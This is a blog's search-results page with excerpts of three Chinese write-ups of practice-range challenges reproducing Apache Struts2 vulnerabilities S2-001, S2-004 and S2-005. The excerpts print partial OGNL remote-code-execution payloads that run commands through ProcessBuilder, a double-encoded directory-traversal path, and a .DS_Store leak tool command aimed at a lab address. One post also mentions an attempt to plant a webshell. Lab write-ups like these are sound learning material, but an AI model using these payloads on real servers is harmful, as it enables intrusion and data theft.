TypechoJoeTheme

mmzkyl

统计
登录
用户名
密码
/
注册
用户名
邮箱
输入密码
确认密码
搜索到 3 篇与 Struts2 的结果 ———
2021-11-11

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-005)复现

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-005)复现
随笔2021-11-11 11:25 可以通过访问如下路径判断是否为Struts2框架 /struts/webconsole.html2021-11-11 21:34 Struts2利用方式存在两种,一种有回显信息,一种无回显信息,此处仅记录有回显信息的利用方式目标靶场解题步骤又是熟悉的 .action 后缀 先通过响应信息查看中间件信息 还是老老实实跟着题目提示走,尝试寻找Struts2 S2-005的利用方式访问首页,然后使用burp suite抓包 修改请求方式,将其改为POST请求方式 将POC插入到请求正文即可redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27pwd%27.toString()....
mmzkyl
2021-11-11

学习笔记

144 阅读
0 评论
2021年11月11日
144 阅读
0 评论
2021-11-11

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-004)复现

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-004)复现
随笔2021-11-11 10:38 一般来说,文件后缀为 .action 的基本为Struts2框架,虽然这个后缀能够自定义修改,但是大部分还是默认 .action 后缀2021-11-11 10:48 Struts2 S2-004 为目录遍历漏洞2021-11-11 10:50 因为题目没看清楚,所以寻找Key的所在位置花了挺久时间目标靶场解题步骤进入首页 由访问路径后缀可确定此为Struts2框架 该环境为Struts2 S2-004漏洞复现,测试能否直接利用该漏洞# %252f -> / 进行两次URL编码所得 /struts/..%252f确定存在目录遍历漏洞,尝试寻找Key所在一层一层目录进行寻找,直至找到了根目录也没有找到包含Key关键词的文件,但是在根目录存在另一个文件 .DS_Store ,有了这个文件又看到了曙光.DS_Store 一般会存在 .DS_Store 文件泄露漏洞,使用工具(工具链接)尝试还原其目录信息,从而寻找Key所在python ds_store_exp.py http://219.153.49.228:40232/struts/..%...
mmzkyl
2021-11-11

学习笔记

59 阅读
0 评论
2021年11月11日
59 阅读
0 评论
2021-11-10

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-001)复现

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-001)复现
随笔2021-11-10 15:48 我原本的想法是通过命令执行过于繁琐,尝试向其写入webshell,然后通过webshell进行管理,这样会比较方便,不过webshell一直没有写入成功2021-11-10 15:51 该命令执行是无法直接使用空格的,具体示例如下%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"find / -iname key.txt"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().pr...
mmzkyl
2021-11-10

学习笔记

61 阅读
0 评论
2021年11月10日
61 阅读
0 评论

互动读者

  • mmzkyl博主

    评论 7 次 | 文章 60 篇

  • takipçi satın al闲逛

    评论 4 次 | 文章 0 篇

  • SirBer闲逛

    评论 2 次 | 文章 0 篇

  • Egy Best闲逛

    评论 2 次 | 文章 0 篇

标签云